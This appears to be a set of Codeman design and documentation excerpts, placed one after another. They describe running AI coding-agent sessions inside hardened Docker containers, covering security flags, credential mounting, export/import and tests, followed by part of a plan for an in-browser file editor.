-`src/docker-hosts.ts` (NEW, direct mirror of `src/remote-hosts.ts`): `readDockerHosts`/`writeDockerHosts`/`readDockerCases`/`writeDockerCases` (via `dataPath`, including `lastClaudeSessionId` read/write), `defaultDockerCommandForMode` (mirror line 60), `dockerDisplayPath` (`container:/path`, mirror `remoteDisplayPath` at 205), `toSessionDocker(host, case)` (mirror `toSessionRemote` at 212), `buildDockerBaseArgs`/`buildDockerCreateArgs` (per-engine uid/userns branch), `hostGatewayAlias(engine)`, `containerApiUrl(processApiUrl, engine)` (scheme+port-preserving, unit-tested), `checkDockerAvailable`/`checkDockerTmuxAvailable`/`probeDockerCliVersion` (15s-bounded, `IS_TEST_MODE` no-op), a config-hash helper for drift, its own POSIX `shellescape` copy (mirror line 83). `const IS_TEST_MODE = !!process.env.VITEST;` gates every real `docker` invocation.
-`src/tmux-manager.ts`: add `DOCKER_TMUX_SOCKET`, `dockerTmuxSessionName`, `buildDockerLaunchCommand` (resume-aware, image-check, env-prime), `buildDockerKillCommand` (Section 4). Extend the two `fullCmd` ternaries (1276, 1524) and the two `launchCmd` cd-skips (1327, 1542). Add `killSession` Strategy 3c after 1719. Ensure `reconcileSessions` (~1800-1815) does NOT hard-delete docker sessions on local-tmux death (recovery relaunch path).
-`src/session.ts`: add `_docker?: SessionDocker` field (mirror `_remote` at 403), constructor arg (477), assignment (550). Thread `docker: this._docker` and `resumeSessionId: this._claudeSessionId` into BOTH `createSessionOptions` and `respawnPaneOptions` in `startInteractive` (1352/1370) and the second path (1740/1750). Emit `docker: this._docker` in `toState()` (1010). Replace the LOCAL cliVersion probe at 1320 for docker with the IN-CONTAINER `probeDockerCliVersion` (do not merely skip it). Extend `resolveMuxAttachCwd(workingDir, remote, docker)` (215) to return `/tmp` when `docker` is set. On claudeSessionId capture, persist it to the owning `DockerCase.lastClaudeSessionId`.
-`src/web/server.ts`: in `restoreMuxSessions` (2160), add `docker: muxSession.docker ?? savedState?.docker` to the `new Session({...})` call (2195-2216), and skip docker in the same `isExternalCliMode`/Ralph recovery guards as remote. Register the instance-scoped boot reaper to run AFTER docker-cases load and AFTER `restoreMuxSessions`. Ensure `CODEMAN_API_URL` derivation reads the SAME `process.env.CODEMAN_API_URL` the server sets at ~2000.
-`src/web/schemas.ts`: add `DockerHostSchema` and `DockerCaseLinkSchema` (below). The three mode enums (177/373/705) and `QuickStartSchema` (368) UNCHANGED (docker resolves by `caseName` lookup like remote).
-`src/web/routes/session-routes.ts`: import the docker helpers from `../../docker-hosts.js`. Add a docker branch in `/api/quick-start` parallel to the remote branch (1686-1720): `readDockerCases` -> find by `caseName` -> `readDockerHosts` -> find by `hostId`; reject `envOverrides`/`effort`/`codexConfig`/`geminiConfig`/`openCodeConfig` (but ACCEPT `modelOverride`, which flows via scaffolded `settings.local.json`); run `checkDockerAvailable` + `checkDockerTmuxAvailable` (image-present, engine, caps-enforced); surface `capsEnforced:false` and Desktop notes; set `casePath = dockerCase.hostWorkspacePath` (REAL host dir), `docker = toSessionDocker(host, dockerCase)`, and seed `resumeSessionId` from `dockerCase.lastClaudeSessionId` when `resumeOnStart`. Extend the LOCAL-availability and local-spawn guards (around 1796/1810) to `!remote && !docker`, but DO NOT extend the workspace-scaffolding guard (~1776, `writeHooksConfig`/`updateCaseModel`), which MUST run for docker. Pass `docker` into `new Session` (1847); `autoConfigureRalph` (1853) gated on `!docker`. Add `docker: m.docker !== undefined ? true : undefined` to the unified harvest (2313).
-`src/web/routes/case-routes.ts`: import the docker read/write/check helpers + schemas. Add a docker listing loop in `GET /api/cases` (mirror 94-119, `location: 'docker'`, `docker: {...}` via `dockerDisplayPath`). Add `/api/docker-hosts` GET/POST/PUT/DELETE (mirror 168-204) and `POST /api/cases/docker-link` (mirror 206-232; run `checkDockerAvailable`/`checkDockerTmuxAvailable` at link time; broadcast `CaseLinked` with `type: 'docker'`). Add a docker-unlink branch to `DELETE /api/cases/:name` (mirror 288-296; `docker rm -f`; broadcast `CaseDeleted``type: 'docker-unlinked'`). Add the docker branch to single-case `GET` (mirror 358-368). Add `POST /api/docker-cases/:name/export`, `/import`, `GET/DELETE /api/docker-exports`, and a `POST /api/docker-cases/:name/recreate` (drift confirm) per Sections 4 and 5.
-`src/web/sse-events.ts` + `src/web/public/constants.js`: reuse `CaseLinked`/`CaseDeleted` for CRUD. Add `docker:exportProgress`, `docker:exportComplete`, `docker:importComplete`, `docker:configDrift`, and `docker:containerError` to BOTH registries (kept in sync per CLAUDE.md).
- Frontend `src/web/public/index.html` (~1831): add a Docker `modal-tab-btn` next to Remote; add a `#case-docker` panel mirroring `#case-remote` with `dockerCaseName`, `dockerHostWorkspacePath`, `dockerContainer`, `dockerImage`, `dockerHostId`, and an Advanced `<details>` for network mode, resource caps, `mountCredentials`, `resumeOnStart`, and remote daemon. Surface a "scaffolds .claude into this host dir" note (user-decision 4) and a "resource caps advisory on this engine" warning when `capsEnforced:false`.
- Frontend `src/web/public/session-ui.js`: `formatCasePickerLabel` (48) + `buildCasePickerOptions` (71-73) handle `location === 'docker'` (`name @ container`, add container/image to the search haystack); `resetCaseModalFields` (~1514) add a `dockerFields` array; `switchCaseModalTab` (1573/1580/1597) handle `'case-docker'`; `submitCaseModal` add the docker branch; new `linkDockerCase()` (mirror `linkRemoteCase` at 1689) POSTing `/api/docker-hosts` then `/api/cases/docker-link`, sending omitted optionals as `undefined` (spread `...(x ? {x} : {})`, never `null`, per the Zod `.optional()`-rejects-null gotcha); `runClaude` (520) / `runShell` (702) extend the `location === 'remote'` routing to also match `'docker'`; `runOpenCode`/`runCodex`/`runGemini` (792/846/900) make the `isRemote` checks `isRemoteOrDocker` so local status probes are skipped. In the session-options Summary tab, note that `effort` is inert for docker (rejected) while `model` IS honored via `settings.local.json`.
- Frontend `src/web/public/panels-ui.js` (425-426): add `caseItem?.docker?.path`/`container` to the case-search fields.
`NO_SHELL_META` (rejects `$`/backtick, schemas.ts:297) is REQUIRED on `image`, `hostWorkspacePath`, `containerWorkdir`, and `container`, because all four reach the outer `bash -c "..."` double-quote layer where `$(...)`/backtick re-expose, exactly the reason `remotePath`/`identityFile` use it. `--privileged` and any `-v /var/run/docker.sock` are structurally unrepresentable (never emitted by the builder, never accepted by the schema).
## 7. Security model
- Hardening flags on every create: `--cap-drop ALL`, `--security-opt no-new-privileges` (NOT auto-set by rootless Docker or Podman, so always explicit), the uid/userns branch of Key decision 6 (never container-root; workspace files stay host-owned and HOME stays writable via GID 0), `--pids-limit` (fork-bomb guard), `--memory` with `--memory-swap == --memory` (real OOM cap), `--ulimit nofile`, `--init`, `--pull=never`. NEVER `--privileged`, NEVER mount the docker socket into the agent container. `--storage-opt size=` is emitted ONLY after the probe confirms overlay2-on-xfs-pquota or btrfs (the AICE-class silently-ignored trap); otherwise it is omitted and the UI does not advertise a size cap. Resource caps are advertised as ENFORCED only when the probe reports `capsEnforced:true`; under non-delegated rootless they are labeled advisory (user-decision 6).
- Engine: prefer whichever the probe finds, Podman-rootless first for security (a container-root breakout lands as an unprivileged host user). Rootless bind-mount ownership uses `--userns=keep-id` (Podman) vs `--user <hostUid>:0` (Docker), so real per-engine branching lives in `buildDockerCreateArgs`. Docker Desktop takes its own uid path (Key decision 6).
- Blast radius (the combined-posture the critic asked to surface, user-decision 5): the default convenient profile mounts an arbitrary host workspace dir RW (host-owned, mirrored path) AND host `~/.claude`/`~/.codex`/`~/.gemini`/`~/.config/gcloud`/`~/.config/opencode` RW into a NETWORK-ENABLED container. Container-run agent code can therefore read/modify those host trees and reach the network simultaneously. This is still a strict improvement over today's on-host skip-permissions execution, but the user must accept the combined posture explicitly; the sealed profile plus `network:none` is the mitigation for genuinely untrusted work.
- Secret handling: creds arrive ONLY as bind-mounted files (default) or exec-time NAME-ONLY `--env` (codex/gemini keys), NEVER as create-time `-e` and NEVER as an image layer. Sealed-mode export is refuse-or-scrub (Section 5), closing the sealed-leak inversion.
- CLAUDE.md "Multi-CLI prefix discipline": the exec-time name-only env is restricted to the CLI-specific keys per mode (Claude: none with OAuth mount; Codex: `OPENAI_API_KEY`/`CODEX_API_KEY`; Gemini: `GEMINI_API_KEY`/`GOOGLE_*`), never a blanket forward. `envOverrides` is rejected for docker, so the `ALLOWED_ENV_PREFIXES` allowlist is not widened.
- hook-secret: bind-mounted read-only, referenced via `CODEMAN_HOOK_SECRET_FILE` (a path, non-secret); the secret bytes never enter env or the image. Both `host.docker.internal` and `host.containers.internal` are added to the host-guard allowlist so the in-container hook curl's Host header passes on either engine.
- Host guard / instance isolation: the in-container tmux socket (`codeman-docker`) and name (`codeman-dkr-<id8>`) deliberately FAIL a container-internal Codeman's `SAFE_MUX_NAME_PATTERN`, so a nested Codeman never adopts our session (unit-asserted). The boot reaper is instance-scoped by the `codeman.instance` label so a beta never reaps prod. Any remote-daemon (`-H`/`--context`) mode is host-root-equivalent and stays strictly behind the existing auth/loopback/host-guard/Origin-CSRF stack.
- Import containment: untrusted bundles are checksum-validated, extracted with traversal guards, and loaded into a quarantined image namespace (never overwriting the base image), then run with the same hardening.
Each phase is independently testable; per CLAUDE.md, end-to-end test in the real env before COM. All new docker IO paths carry `const IS_TEST_MODE = !!process.env.VITEST;` and no-op under it; the pure command builders are tested directly.
- Phase 0: base image + engine probe. Author `docker/agent.Dockerfile` (OpenShift arbitrary-uid HOME) and `scripts/build-agent-image.mjs` (build or pull the base image; digest recorded). Add `checkDockerAvailable`/`checkDockerTmuxAvailable`/`containerApiUrl`/`hostGatewayAlias` (IS_TEST_MODE no-op) and `GET /api/docker/status`. Test: probe stub returns available/caps/Desktop flags under VITEST; `containerApiUrl` preserves scheme+port and swaps host per engine; status route returns the envelope.
- Phase 2: tmux-manager builders. Add `DOCKER_TMUX_SOCKET`, `dockerTmuxSessionName`, `buildDockerLaunchCommand` (resume-aware, image-check, env-prime), `buildDockerKillCommand`; wire the two ternaries + two cd-skips + Strategy 3c; harden `reconcileSessions` against docker hard-delete. Test (pure strings): adopt-proof name fails `SAFE_MUX_NAME_PATTERN`; image-check precedes create; `new-session -A` idempotent; resume flag present only when a resume id is passed; `--pull=never` present; instance label present; escaping survives `bash -c` -> `docker exec` -> `sh -lc` -> tmux WITH a host workspace path containing spaces.
- Phase 3: session.ts + mux + recovery. Add `_docker` + `resumeSessionId` threading, in-container cliVersion probe, `resolveMuxAttachCwd`, mux-interface fields, `restoreMuxSessions` passthrough, instance-scoped reaper wiring, claudeSessionId -> `DockerCase.lastClaudeSessionId` persistence, unified flag. Test: `toState()` emits docker; a persisted docker session round-trips through mux/state; a relaunch injects the persisted resume id (mock mux); reaper only targets this instance's orphaned containers.
- Phase 4: routes + first real e2e. case-routes CRUD + listing + drift-recreate; session-routes quick-start branch (scaffolding RUNS, local-availability guards skip, model accepted, effort/config rejected). Manual e2e on a real docker host: docker-host create -> docker-link -> quick-start; confirm the pane runs `claude` in the container, files land host-owned, a Codeman restart reattaches the SAME live agent, and a `docker stop` followed by relaunch RESUMES the conversation.
- Phase 5: hooks connectivity + installation. host-gateway (per engine), derived `CODEMAN_API_URL`, hook-secret mount, `CODEMAN_SESSION_ID`/`CODEMAN_MUX` exec-env + tmux setenv, host-guard allowlist, and the scaffolding write into the real workspace. Manual e2e: trigger a permission prompt from inside the container and confirm it surfaces; verify hook payloads carry the right session id. If deferred, ship docker as explicitly hook-degraded and verify output-based idle detection through the docker-exec PTY.
- Phase 6: export/import + GC + disk safety. quiesce+pause span, free-space precheck, commit+save+gzip + workspace tar + manifest + streaming download; sealed-mode refuse-or-scrub; retention/auto-prune; import with checksum validation + traversal guard + quarantined re-tag; drift-recreate; boot reaper; `runWithConversionLimit` cap; `docker rmi` in finally. Manual e2e: export, `docker load` on a second machine (or fresh case), import, confirm toolchain + workspace restored and NO creds present; attempt a sealed full-image export and confirm it is refused-or-scrubbed; attempt a `../` bundle and confirm it is rejected.
- Phase 7: frontend. Docker tab, `linkDockerCase`, run wiring, case-picker labels, panels search, caps-advisory + scaffold-warning + effort-inert notes. Verify with Playwright (`waitUntil: 'domcontentloaded'`, 3-4s settle) that the Docker tab renders and a linked docker case appears in the picker.
- Phase 8: docs + COM. Update CLAUDE.md (a "Docker cases" Key Pattern paragraph mirroring remote-SSH, plus the new state files, routes counts, and the resume/durability model), `docs/docker-cases.md`, then COM per the standard flow.
## 9. Test plan
- Unit (pure, CI-safe, mirror `test/remote-hosts.test.ts` / `test/remote-ssh-options.test.ts`):
-`test/docker-hosts.test.ts`: storage round-trip (incl. `lastClaudeSessionId`), `dockerDisplayPath`, `defaultDockerCommandForMode`, `toSessionDocker`, `containerApiUrl` (http/https, custom port, docker vs podman gateway), config-hash stability/drift, `buildDockerCreateArgs` flag ordering (cap-drop/no-new-privileges/memory==memory-swap/instance-label/`--pull=never` present; host/privileged/socket absent; per-engine uid vs `--userns=keep-id`).
-`test/docker-exec-options.test.ts`: `buildDockerLaunchCommand`/`buildDockerKillCommand` string shape and escaping through `bash -c` -> `docker exec` -> `sh -lc` -> tmux, including a workspace path with spaces; resume flag present only with a resume id; image-presence check precedes create; `dockerTmuxSessionName` fails `SAFE_MUX_NAME_PATTERN`; schema rejects `$`/backtick in image/workdir/container/name; `linkDockerCase`-shaped bodies with omitted optionals validate (no `null` on the wire).
- Probe no-op: `checkDockerAvailable`/`checkDockerTmuxAvailable`/`probeDockerCliVersion` return canned values under VITEST and never spawn.
- Integration (route tests via `app.inject()`, docker no-op'd): `/api/docker-hosts` CRUD; `/api/cases/docker-link` dup-check + broadcast; `GET /api/cases` includes the docker case with `location: 'docker'`; `/api/quick-start` docker branch rejects `envOverrides`/`effort`/config but ACCEPTS `modelOverride`, runs the workspace-scaffolding path, and constructs a session with `docker` set + seeded resume id; `DELETE /api/cases/:name` docker-unlink; export refuse-or-scrub for sealed; import traversal rejection; reaper instance-scoping (label filter). Pick a unique port only if a live-server test is added (search `const PORT =`; 3150+).
- Manual end-to-end (real docker daemon, the mandatory "always end-to-end test" gate): build the base image; link a docker case; quick-start `claude`; verify OAuth via the mounted `~/.claude`, transcript correlation (subagent/workflow watchers show the session), host-owned files, and a working permission-prompt hook; reattach after a Codeman PROCESS restart (SAME live agent); `docker stop` then relaunch and confirm conversation RESUME; reboot-equivalent (daemon restart) and confirm boot recovery recreates+resumes; change the host's memory/image and confirm the drift-recreate prompt fires; export (convenient) and confirm the tar `docker load`s with no creds; attempt a sealed full-image export and confirm refuse-or-scrub; import into a fresh case; delete the case and confirm `docker rm -f` plus instance-scoped reaper GC; confirm a docker-down state surfaces a docker-specific error and does NOT trip the generic PTY-exit breaker.
## 10. Open decisions for the user
1. Credential + blast-radius posture (combined). Convenient default bind-mounts host `~/.claude` etc. RW AND an arbitrary host workspace RW into a network-enabled container, so container-run agent code can read/modify those host trees and reach the network at the same time. Recommended: convenient default plus a per-host SEALED opt-in (`mountCredentials:false` + `network:none`) for untrusted work. Please confirm you accept the combined arbitrary-workspace-plus-egress-plus-host-creds posture for the default profile (it is still a net improvement over today's on-host skip-permissions execution).
2. Base image ownership, registry, and freshness. The `codeman/agent:base` placeholder implies a Docker Hub org the project may not own. Pick the real registry/namespace (GHCR under the repo is the natural fit), decide digest pinning, and set a REBUILD CADENCE so agents are not stuck on a stale baked `claude` (the in-container version probe surfaces staleness, but something must trigger rebuilds). Choose: pull a pinned published image, build locally on first use via `scripts/build-agent-image.mjs`, or both.
3. Container CWD strategy. Mirror the host workspace path inside the container (recommended: makes transcript projHash correlate, file features and resume capture work) vs a fixed `/workspace` (simpler mount, breaks watcher correlation). Please confirm the mirror approach.
4. Hooks in the MVP AND workspace scaffolding. Making docker hooks fire requires WRITING `.claude/settings.local.json` (and the CLAUDE.md scaffold) into the user's REAL linked host directory, a behavioral shift from "link a dir" to "link and scaffold a dir." Choose: wire hooks + scaffolding now (Phase 5, recommended, and it also enables the model picker), or ship docker as explicitly hook-degraded (no permission prompts / hook-idle) for v1 and add later. Confirm you are OK with Codeman mutating the linked host workspace.
5. Session-kill teardown and RESUME (reframed honestly). `docker stop` on session kill is not merely "free RAM vs instant reattach": it destroys the in-container live agent, and the conversation survives ONLY because the next launch runs `--resume` from the bind-mounted transcript. Choose: keep the container running (costs RAM, preserves the exact live in-flight agent) vs stop and rely on `--resume` (frees RAM, may lose uncommitted in-flight tool state). Case-delete always `docker rm -f`.
6. Rootless enforcement posture. Under rootless without cgroup-v2 systemd delegation, `--memory`/`--cpus`/`--pids-limit` are SILENTLY ignored. Choose: REQUIRE delegation (refuse to link a host that cannot enforce caps) or ship-with-warning ("resource caps are advisory on your engine"). The probe reports `capsEnforced` either way.
7. Default resume behavior. Should a re-linked or re-run docker case default to resuming its last conversation (`resumeOnStart:true`, using `DockerCase.lastClaudeSessionId`) rather than starting clean? This is the crux of making the durability story real and is the recommended default, but it changes user-visible behavior (a new session in an existing case continues the prior conversation).
8. Export defaults and disk budget. Default export button: workspace-only (fast, small, files-only, recommended for 24h+ runs) vs full-image (reproducible env, multi-GB). Also set the retention cap (max retained exports), the auto-prune policy, and the free-space threshold below which export is refused (a full `/var/lib/docker` breaks EVERY session on the host, not just docker ones).
9. Remote docker daemon (`-H ssh://...` / `--context`). Support in the MVP (composes with remote hosts, adds host-root trust surface) or local-daemon-only first.
10. Podman parity depth. Full `--userns=keep-id` plus Quadlet boot-persistence, or Docker-first with Podman as best-effort and boot-persistence via Codeman's idempotent create-if-missing only. Note the podman host alias is `host.containers.internal`, already handled per engine.
Run a case inside an **isolated Docker container** instead of directly on the host. Any number of Codeman sessions can share one container (it is scoped to the case, not the session), so a whole project lives in a sandbox with its own network, resource caps, and filesystem, and you can **export the container to move it to another machine**.
Docker mode is a **location overlay on cases**, the direct analog of [remote SSH cases](./remote-hosts.md): where a remote case runs a local tmux pane doing `ssh host` into a durable remote tmux server, a docker case runs a local tmux pane doing `docker exec -it` into a durable **in-container** tmux server. It is not a separate `SessionMode`, so `claude` / `shell` / `opencode` / `codex` / `gemini` / `antigravity` / `pi` / `grok` all work inside the container.
## One-time setup: build the base image
The container needs a base image with the agent toolchain (node, the CLIs, git, tmux). Build it locally once:
The image is **secret-free**: credentials are delivered at runtime (bind mounts or `docker exec --env`), never baked in, so exports never leak them.
⚠️ **Re-build with `--no-cache`, always.** The CLIs are installed in a single `RUN npm install -g` layer, so a plain rebuild re-uses it from the Docker layer cache and the CLIs stay frozen at whatever versions the image was **first** built with, however long ago that was. Editing the Dockerfile does not help unless the edit lands at or above that line: a change appended below it leaves the npm layer cached and only runs the new step. Observed 2026-08-06: a rebuild silently kept a stale `@openai/codex@0.144.6` whose aliased platform binary had not installed, so every `codex` docker case died with `Missing optional dependency @openai/codex-linux-x64` while the build itself reported success.
```bash
node scripts/build-agent-image.mjs --no-cache
```
A zero exit code only proves the layers ran, not that the toolchain works. Verify by actually executing each CLI in the image, and check the build log for `Using cache` lines:
```bash
docker run --rm codeman/agent:base bash -lc \
'for c in claude codex gemini opencode agy pi grok; do printf "%-9s " $c; $c --version 2>&1 | head -1; done'
```
Antigravity (`agy`) and Grok (`grok`) are the two CLIs not installed from npm (Google and xAI ship standalone binaries), so each has its own Dockerfile step, adding roughly 190MB and 160MB respectively. Pi also gets its own step, because upstream documents installing it with `--ignore-scripts` and that flag must not silently change how the other npm CLIs install.
Pi's credentials are seeded per-FILE rather than as a whole directory (`auth.json`, `settings.json`, `trust.json`, `models.json`, `models-store.json` out of `~/.pi/agent`), because that directory also holds `sessions/`, `extensions/`, `skills/` and the installed package trees — gigabytes on an active host. Consequence: in-container pi sessions are invisible host-side, so `pi -c` inside a Docker case only sees that container's own history. See [`pi-integration.md`](./pi-integration.md). Grok is seeded per-file for the same reason (`auth.json`, `config.toml`, `pager.toml` out of `~/.grok`, which also holds `sessions/`, `memory/` and the ~160MB binary under `downloads/`), with the same consequence for `grok -c`. See [`grok-integration.md`](./grok-integration.md).
## Quickest path: one-click "Run in Docker"
On the **New case → Create New** tab there's a **🐳 Run in an isolated Docker container** checkbox. Checking it alone is enough: Codeman creates the case folder in `~/codeman-cases/<name>`, spins up a hardened container with sensible defaults (auto-provisioning a shared `default` host), and starts the session inside it. No host/image/network fields to fill in.
Click the checkbox's **Container settings** to optionally tweak the predefined defaults, including a **Template** picker:
| Template | Memory | CPUs | GPUs |
|----------|--------|------|------|
| Small | 2 GB | 1 | none |
| Medium (default) | 4 GB | 2 | none |
| Large | 8 GB | 4 | none |
| GPU | 8 GB | 4 | all (needs the NVIDIA container toolkit) |
**Disk is elastic** — the container's storage grows automatically as data flows in; there is no fixed cap (bounded only by host disk). Any tweaked setting creates a dedicated per-case host so it never changes the shared `default`.
## Create a docker case (full control)
App → **New case → Docker** tab:
- **Case Name** / **Workspace Path**: the workspace is a real HOST directory bind-mounted into the container at the same path. Codeman scaffolds `CLAUDE.md` + `.claude/settings.local.json` (hooks) into it, and file previews / attachments work on the real bytes.
- **Host ID**: a reusable docker host profile (image, network, resources). Reuse the same ID across cases to share settings.
- **Network**: `bridge` (internet on, default), `none` (fully isolated), or a `custom` bridge.
- **Advanced**: memory / CPU caps, **Mount host credentials** (on = your existing `~/.claude` login just works; off = a sealed sandbox you log into inside the container), **Resume last conversation on relaunch**.
Then run it like any case (Run Claude / Run Shell / …). The first launch creates the container (`codeman-case-<name>`); subsequent sessions attach to the same one.
Equivalent API:
```bash
curl -X POST localhost:3000/api/docker-hosts -d '{"id":"local","label":"Local","image":"codeman/agent:base"}'
curl -X POST localhost:3000/api/cases/docker-link -d '{"name":"sandbox","hostId":"local","hostWorkspacePath":"/home/you/projects/sandbox"}'
curl -X POST localhost:3000/api/quick-start -d '{"caseName":"sandbox","mode":"claude"}'
```
## Lifecycle
- **Reconnect after a Codeman restart** lands back in the same live agent (the in-container tmux survives).
- **Container stop / host reboot** restarts the container and **resumes** the last conversation from the bind-mounted transcript. Claude sessions launch with a pinned conversation id (`--session-id <sessionId>`, with a `--resume` fallback when the transcript already exists), and the case remembers its last conversation (`lastClaudeSessionId`), so a relaunch after the container was stopped, rebooted, or recreated continues where it left off.
- **Killing one session** only kills that session's in-container tmux session; the shared container stays up for sibling sessions.
- **Editing the docker host config** (image, memory, network, ...) is detected on the next launch: the desired config hash is compared against the container's `codeman.confighash` label, and a mismatch refuses the launch with a "config changed, recreate?" confirm. Confirming calls `POST /api/docker-cases/:name/recreate` (refused while sessions of the case are live), which removes the container so the next launch recreates it with the new config; the workspace and the conversation survive.
- **Deleting the case** `docker rm -f`s the container (the bind-mounted workspace on the host survives). An instance-scoped boot reaper removes containers whose case is gone.
## Isolation & security
Every container runs hardened: `--cap-drop ALL`, `--security-opt no-new-privileges`, non-root (`--user <hostUid>:0` so workspace files stay host-owned), `--pids-limit`, `--memory` == `--memory-swap`, `--init`. Never `--privileged`, never the docker socket. The default **convenient** profile bind-mounts host credential dirs read-write so the common login just works (creds stay on the host, never captured by `docker commit`); the **sealed** profile (`mountCredentials:false` + `network:none`) is the opt-in for genuinely untrusted work.
Rootless engines without cgroup-v2 systemd delegation cannot enforce resource caps; linking such a host warns that caps are advisory.
## Export / Import (move to another machine)
**Export** (from the Docker tab, or `POST /api/docker-cases/:name/export`): choose
- **Full image + workspace**: `docker commit` the container to an image, `docker save` it, tar the workspace, and a manifest, all into one portable `<case>-<ts>.codeman-container.tgz` (the whole toolchain, installed packages, and files). Runs in the background; you are notified when the bundle is ready.
- **Workspace only**: just the project files (fast, small).
The container is paused across the capture so the image and workspace are consistent; a full `/var/lib/docker` is guarded against with a free-space precheck; the intermediate image is always cleaned up.
**Import** (`POST /api/docker-cases/import`, or the Manage tab): copy the `.tgz` onto the new machine's `~/.codeman/docker-exports/`, then import it into a new case. The manifest and per-member SHA-256 checksums are validated, the workspace tar is extracted with a path-traversal guard, and the image is `docker load`ed and **re-tagged into a quarantined namespace** (`codeman/imported-<case>:<ts>`) so it never overwrites a local tag. The destination supplies its own credentials, so nothing secret crosses machines.
## Hooks require the server to be reachable from the container
In-container hooks (permission events, hook-based idle/stop/task notifications) POST to `CODEMAN_API_URL`, which is derived as `https://host.docker.internal:<port>` (`host.docker.internal` → the docker bridge gateway, e.g. `172.17.0.1`, via `--add-host …:host-gateway`). For that callback to succeed, the Codeman server must be **listening on an interface the container can reach**.
- If Codeman binds **loopback-only** (`127.0.0.1`, the default and the production systemd config), a container reaching `172.17.0.1:<port>` cannot connect, so by default **in-container hooks do not fire**. The session still works fully: idle/stop detection falls back to **output-based** detection through the `docker exec` PTY (which always works), and claude runs with `--dangerously-skip-permissions` so there are no permission prompts to forward anyway.
- **To enable in-container hooks on a loopback-only server, set `CODEMAN_DOCKER_BRIDGE_HOOKS=1`** (env). Codeman then starts a SECOND listener bound to the docker bridge gateway (`172.17.0.1`, auto-detected; override with `CODEMAN_DOCKER_BRIDGE_HOST`) that serves **only the hook endpoints** (`/api/hook-event`, `/api/status-telemetry`) and delegates them into the same secret-gated pipeline. The bridge is host-internal (containers + host, not the LAN), and every other path returns `403`, so this does not widen your network exposure. Add `Environment=CODEMAN_DOCKER_BRIDGE_HOOKS=1` to the systemd unit and restart.
- Alternatively, bind `0.0.0.0`**with `CODEMAN_PASSWORD` set** (exposes on the LAN too).
The host-gateway mapping, `CODEMAN_API_URL` derivation, host-guard allowlist, and hook-secret mount are all wired correctly; `CODEMAN_DOCKER_BRIDGE_HOOKS` closes the last gap for loopback-only servers.
## Notes & limits
- Requires Docker (or Podman) with a reachable daemon; tmux must be present in the base image (a hard prerequisite, probed at link time).
- Per-session `envOverrides` / `effort` / per-CLI config are rejected for docker cases (they do not cross into the container); configure the container via the docker host's per-mode command override instead.
- macOS Docker Desktop takes a dedicated uid path (the baked image uid; memory caps are subject to the VM ceiling).
Reset in `closeFilePreview()` and on every `openFilePreview()` entry.
### 5.2 Markup (`index.html:420-432`)
Add one header button (pencil, `btn-icon-sm`, `id="filePreviewEditBtn"`, hidden by default) next to the
copy button, and an edit bar inside the footer region holding Save / Cancel / a dirty dot. Keep the
existing footer text element; the edit bar is a sibling toggled by class so the read-mode footer is
untouched.
### 5.3 Behavior
-`openFilePreview()` shows the Edit button only when the response has `editable: true` and the render took
the text branch. Attachment-id previews, media, binary, pdf, docx/pptx and svg all leave it hidden.
- **Enter edit**: re-fetch with `edit=1`; on 413 or `editable:false`, toast the reason and stay in read
mode. This fetch must **parse the error envelope on non-ok responses**: the existing generic
`if (!res.ok) throw new Error('Failed to load file')` pattern (`panels-ui.js:3275`) would swallow the
specific "too large to edit here" message, since error envelopes arrive with real 4xx statuses in prod. On success replace the body with `<textarea class="file-preview-editor" spellcheck="false"
autocapitalize="off" autocorrect="off" autocomplete="off" wrap="off">` and assign `.value = content`
(never `innerHTML`, so no escaping question arises). Do **not** autofocus: on a phone that opens the
keyboard before the user has picked a line.
-`input` sets `dirty` and enables Save.
- **Save**: `PUT` with `baseHash`, `eol`, and `content`. On success update `baseHash`/`original` from the
response, leave edit mode, re-render the read view from the local editor value (the response carries
metadata only, not content), toast "Saved". On **409** offer `Reload (discard mine)` / `Overwrite`:
Reload re-fetches `edit=1` and replaces the buffer; Overwrite re-sends with `force: true`. The 409 body
itself carries no state (section 3.3, step 9).
- **Cancel / close / Escape while dirty**: `confirm('Discard unsaved changes?')`, consistent with the
existing `window.confirm` usage in this codebase (`panels-ui.js:4323`, `app.js:4176`). Note the global
Escape handler (`app.js:999-1007`) closes other panels via `closeAllPanels()` but does not touch this
overlay today; if Escape-to-close is wired up as part of this work it must go through the same dirty
guard.
-`copyFilePreviewContent()` copies the live editor value while editing.
⚠️ Repo gotcha to respect at the fetch call: **Zod `.optional()` rejects `null`**. Build the body with
`eol: eol ?? undefined` (or declare `.nullish()`), or the PUT fails `INVALID_INPUT`. This has shipped as a
real bug twice.
### 5.4 Mobile
- **Sizing.** The window is `80vw/80vh` centered with no mobile override, so when the keyboard opens on iOS
the lower half sits behind it. Add a `@media (max-width: 430px)` block using
`height: var(--app-height, 100vh)`, full width, no border radius. `--app-height` is already maintained
against `visualViewport` by `KeyboardHandler.handleViewportResize()` (`mobile-handlers.js:283-317`), so
the editor tracks the keyboard for free.
- **iOS zoom.** The editor font must be >= 16px on phones; there is an existing zoom-prevention block at
`mobile.css` under `@media (max-width: 768px)`. Verify it covers `textarea` and do not override it with a
smaller `rem` value.
- **Accessory bar.** Focusing any input fires `KeyboardHandler.onKeyboardShow()`, which calls
`KeyboardAccessoryBar.show()` and refits/resizes the terminal (`mobile-handlers.js:407+`). The bar's keys
target the **terminal**, not the editor, so an Esc or clear-input tap while editing goes to the agent.
The overlay's `z-index: 2000` covers the bar's `51`, so it is not visible, but confirm it is not
interactive underneath and consider an explicit `KeyboardAccessoryBar.hide()` while the editor holds
focus. This is the item most likely to look "fine on desktop, wrong on the phone".
- No header-policy change is needed (section 1), so
| `test/routes/file-write-routes.test.ts` | `app.inject` | The handler order in 3.3, against a **real temp dir** (do not `vi.mock('node:fs')` in this file; set `MockSession.workingDir`, `test/mocks/mock-session.ts:14`) |
| extend `test/routes/file-routes.test.ts` | `app.inject` | `edit=1` never truncates; `editable` present on the plain read |
Status-code caveat for all of these: the route-test harness does not install the server's preSerialization
envelope hook, so a handler that *returns* an error envelope answers 200 in tests. The statuses below are
only assertable because the plan has the handler **throw** structured errors (section 3.3, error
mechanics), which `installRouteErrorHandler` renders identically in prod and in the harness.
Route cases to assert explicitly:
1. happy path writes the bytes and returns a new hash
2.`../` and absolute paths give 404
3. symlink pointing outside the workspace gives 404
4. symlink pointing inside is written through to the target
5. non-allowlisted extension gives 400
6.`.git/config` gives 403
7. a `.env` in the workspace gives 403 (sensitive-path)
8. a file with a NUL byte gives 400
9. a latin-1 file that fails the UTF-8 round-trip gives 400
10. stale `baseHash` gives 409 (`CONFLICT` envelope, no data); `force:true` then succeeds
